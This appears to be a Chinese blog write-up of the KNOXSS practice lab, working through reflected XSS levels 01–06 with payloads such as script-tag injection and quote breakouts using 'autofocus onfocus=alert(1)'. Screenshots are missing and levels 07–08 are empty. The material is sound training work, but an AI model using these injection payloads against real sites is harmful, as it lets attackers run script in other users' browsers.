当前位置: 首页 > news >正文

XSS靶场实战(工作wuwuwu)

knoxss

knoxss

Single Reflection Using QUERY of URL

——01

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

测试标签

<script>alert(666666)</script>

在这里插入图片描述

——02: "

在这里插入图片描述

在这里插入图片描述

<h1>test</h1>

在这里插入图片描述
没有反应,查看源码
在这里插入图片描述
现在需要闭合双引号,我计划还是先搞标签

"><h1>test</h1>

在这里插入图片描述
标签上:

"><script>alert(666666)</script>

在这里插入图片描述
在这里插入图片描述

——03: ’

在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

闭合","被实体编码
在这里插入图片描述

'闭合
在这里插入图片描述

'>来闭合

'><h1>test</h1>

在这里插入图片描述
不多的时候:
在这里插入图片描述

标签上:

'><script>alert(666666)</script>

在这里插入图片描述
在这里插入图片描述

——04:" + input属性

在这里插入图片描述
在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

"闭合
在这里插入图片描述
发现"闭合了,但是标签无法被闭合,只能看属性

找到 input 对应的xss属性

<input autofocus onfocus=alert(1)>

使用

"autofocus onfocus=alert(1) b="

在这里插入图片描述
刷新页面就触发!

——05: ’ + input

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

"闭合
'

‘闭合
在这里插入图片描述
闭合,但是 > 被实体编码

属性

' autofocus onfocus=alert(1) b="

'后面是否有空格 都行
在这里插入图片描述

——06

页面看不到
在这里插入图片描述
①源码搜索到:
在这里插入图片描述

再去前面找到对应的,未来edit as html

②直接搜索也可(ctrl + F)
在这里插入图片描述

<h1>test</h1>

在这里插入图片描述

"闭合
在这里插入图片描述

使用属性

" autofocus onfocus=alert(1) b="

在这里插入图片描述
自己赋值了,没有找到其他属性,找到了也由于 type=“hidden” 搞不了

type="hidden"如何xss:
ai
浏览器搜索都没有帮我解决

最接近成功的方案:
“accesskey=“X”%20οnclick=“alert(6666)”%20b=”
alt+X触发

——07

在这里插入图片描述

——08


http://www.mrgr.cn/news/100725.html

相关文章:

  • Scrapy框架之CrawlSpider爬虫 实战 详解
  • 2025.4.29_STM32_看门狗WDG
  • 【网络】HTTP报文首部字段
  • (2)python之虚拟环境管理工具venv和anaconda
  • Vue3 里 CSS 深度作用选择器 :deep()
  • 运维打铁:Linux 网络详解
  • GTC Taipei 2025 医疗域前瞻:从AI代理到医疗生态,解码医疗健康与生命科学的未来图景
  • UBUS 通信接口的使用——添加一个object对象(ubus call)
  • uml类关系(实现、继承,聚合、组合,依赖、关联)
  • SpringCloud学习笔记
  • 推荐系统中 Label 回收机制之【时间窗口设计】
  • Unity-Shader详解-其三
  • 实现一个简单回调列表
  • 51c自动驾驶~合集37
  • Docker安装的mysql限制ip访问
  • ACTF2025 - WEB Excellent-Site
  • 二叉树知识点
  • 软考高项(信息系统项目管理师)第 4 版全章节核心考点解析(第4版课程精华版)
  • 复旦大学发布全球首款二维半导体芯片——无极
  • LangChain入门(四) 部署应用程序